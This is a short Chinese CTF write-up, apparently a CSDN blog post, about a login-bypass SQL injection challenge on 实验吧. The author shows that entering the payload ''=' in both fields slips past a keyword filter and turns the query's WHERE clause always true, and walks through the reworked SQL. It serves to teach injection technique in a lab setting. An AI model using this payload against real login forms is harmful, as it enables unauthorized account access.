实验吧 登陆一下好吗?? 简单注入 By Assassin

本文介绍了一种简单的SQL注入攻击手法,通过巧妙利用未被过滤的特殊字符绕过安全检查,成功实现对目标系统的非法访问。文章详细分析了payload构造过程,并强调了实际操作中的注意事项。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目想法挺简单的,是时候学习一下注入的套路了,真的要不简单的也想不到。

这里写图片描述

发现* / select union or 都被过滤了,一开始想的太复杂了,以为是个什么waf过滤什么的,但是看了pcat前辈的WP发现真的很基础吧。

但是and ‘什么的都没有过滤!

payload真的简单到淫荡,看一下就是这样的

admin-> ‘=’
password-> ‘=’

真是醉了,为什么呢,类似这样的语句
$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;

如果我们按照上面输入就成了
$sql = “select user from flag where user=’‘=’’ and password=’‘=’‘”;

user=”返回的是NULL=”也是符合条件的,最后就是

$sql = “select user from flag where 1 and 1”;

这里写图片描述

还是需要多实验啊~

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值